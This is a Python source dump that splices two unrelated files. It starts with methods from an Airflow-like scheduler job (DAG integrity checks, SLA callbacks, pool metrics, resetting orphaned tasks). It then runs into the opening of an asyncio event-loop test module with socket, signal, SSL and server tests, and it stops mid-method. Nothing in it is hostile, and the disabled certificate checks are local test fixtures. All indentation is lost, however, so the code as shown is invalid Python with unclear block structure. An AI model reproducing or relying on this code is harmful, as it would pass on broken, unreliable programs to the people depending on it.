def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED]) # type: ignore
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING]) # type: ignore
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
for attempt in run_with_db_retries(logger=self.log):
with attempt:
self.log.debug(
"Running SchedulerJob.adopt_or_reset_orphaned_tasks with retries. Try %d of %d",
attempt.retry_state.attempt_number,
MAX_DB_RETRIES,
)
self.log.debug("Calling SchedulerJob.adopt_or_reset_orphaned_tasks method")
try:
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(
query, of=TI, session=session, **skip_locked(session=session)
).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s",
len(to_reset),
task_instance_str,
)
# Issue SQL/finish "Unit of Work", but let @provide_session
# commit (or if passed a session, let caller decide when to commit
session.flush()
except OperationalError:
session.rollback()
raise
return len(to_reset)
|
test_events.py | """Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import gc
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import proactor_events
from asyncio import selector_events
from asyncio import sslproto
from asyncio import test_utils
try:
from test import support
except ImportError:
from asyncio import test_support as support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
def osx_tiger():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {'serialNumber': 'B09264B1F2DA21D1',
'version': 1,
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Nov 13 19:47:07 2022 GMT',
'notBefore': 'Jan 4 19:47:07 2013 GMT'}
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
def test_run_until_complete_nesting(self):
@asyncio.coroutine
def coro1():
yield
@asyncio.coroutine
def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
